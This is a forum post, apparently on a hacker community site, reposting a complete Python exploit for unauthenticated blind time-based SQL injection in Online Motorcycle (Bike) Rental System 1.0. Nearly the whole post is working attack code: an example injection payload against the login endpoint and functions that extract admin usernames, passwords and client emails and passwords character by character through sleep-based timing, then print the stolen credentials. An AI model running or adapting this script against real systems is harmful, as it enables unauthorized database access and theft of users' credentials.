Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

Online Motorcycle (Bike) Rental System 1.0 - Blind Time-Based SQL Injection (Unauthenticated)

 Share


HACK1949

Recommended Posts

# Exploit Title: Online Motorcycle (Bike) Rental System 1.0 - Blind Time-Based SQL Injection (Unauthenticated)
# Exploit Author: Chase Comardelle(CASO)
# Date: October 18, 2021
# Vendor Homepage: https://www.sourcecodester.com/php/14989/online-motorcycle-bike-rental-system-phpoop-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/bike_rental_0.zip
# Tested on: Kali Linux, Apache, Mysql
# Vendor: oretnom23
# Version: v1.0
# Exploit Description:
# Online Motorcycle (Bike) Rental System is vulnerable to a Blind Time-Based SQL Injection attack. This can lead attackers to remotely dump MySql database credentials


#EXAMPLE PAYLOAD - test@email.com' UNION SELECT IF((SELECT SUBSTRING((SELECT password from users where username='admin'),1,1)='1'),sleep(10),'a'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL;
#EXAMPLE EXECUTION - python3 sqliExploit.py http://localhost/bike_rental/ 

import requests
import sys
import urllib3
import pyfiglet 




urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}



def find_clients_usernames(url):
    clients = ""
    cookies = {'Cookie:':'PHPSESSID='}
    headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'}
    path = '/classes/Login.php?f=login_user'
    position = 1
    i=0
    while i <len(chars) :
        sqli = "email=test@email.com'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(email+SEPARATOR+',')+from+clients),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i])
        r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False)
    
        if r.elapsed.total_seconds() > 1:
            clients += chars[i]
            i=0
            position+=1
        else:
            i +=1    
    return clients


def find_db_usernames(url):
    users = ""
    cookies = {'Cookie:':'PHPSESSID='}
    headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'}
    path = '/classes/Login.php?f=login_user'
    position = 1
    i=0
    while i <len(chars) :
        sqli = "email=test@email.com'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(username+SEPARATOR+',')+from+users),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i])
        r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False)
    
        if r.elapsed.total_seconds() > 1:
            users += chars[i]
            i=0
            position+=1
        else:
            i +=1    
    return users

def find_db_passwords(url):
    passwords = ""
    clientCount = 0
    cookies = {'Cookie:':'PHPSESSID='}
    headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'}
    path = '/classes/Login.php?f=login_user'
    position = 1
    i=0

    while i <len(chars) :
        sqli = "email=test@email.com'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(password+SEPARATOR+',')+from+users),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i])
        r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False)

        if r.elapsed.total_seconds() > 1:
            passwords += chars[i]
            i=0
            position+=1
        else:
            i +=1   

    return passwords

def find_client_passwords(url):
    passwords = ""
    clientCount = 0
    cookies = {'Cookie:':'PHPSESSID='}
    headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'}
    path = '/classes/Login.php?f=login_user'
    position = 1
    i=0

    while i <len(chars) :
        sqli = "email=test@email.com'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(password+SEPARATOR+',')+from+clients),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i])
        r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False)

        if r.elapsed.total_seconds() > 1:
            passwords += chars[i]
            i=0
            position+=1
        else:
            i +=1   
 
    return passwords


def create_table(users,passwords):
    
    
    for  i in range(0,len(users)):
       print(users[i]," | ",passwords[i])

def print_header():
    print("[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]")
    print("[*]     Online Motorcycle (Bike) Rental System     [*]")
    print("[*] Unauthenticated Blind Time-Based SQL Injection [*]")
    print("[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]")
    print("\n")
    print(pyfiglet.figlet_format("      CAS0", font = "slant"  ))  

chars = [ 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o',
          'p','q','r','s','t','u','v','w','x','y','z','A','B','C','D',
          'E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S',
          'T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7',
          '8','9','@','#',",",'.']



if __name__ == "__main__":
    try:
        url = sys.argv[1].strip()
    except IndexError:
        print("[-] Usage: %s <url>" % sys.argv[0])
        print("[-] Example: %s www.example.com" % sys.argv[0])
        sys.exit(-1)


print_header()
print("[*] RETRIEVING CREDENTIALS NOW [*]")
dbUsernames = find_db_usernames(url)
dbUsernames = dbUsernames.split(",")

dbPasswords = find_db_passwords(url)
dbPasswords = dbPasswords.split(",")

print("[*] DATABASE CREDENTIALS [*]")
create_table(dbUsernames,dbPasswords)

clientUsernames = find_clients_usernames(url)
clientsUsernames = clientUsernames.split(",")

clientPasswords = find_client_passwords(url)
clientPasswords = clientPasswords.split(",")

print("[*] CLIENT CREDENTIALS [*]")
create_table(clientsUsernames,clientPasswords)
            
Link to post
Link to comment
Share on other sites

 Share

discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...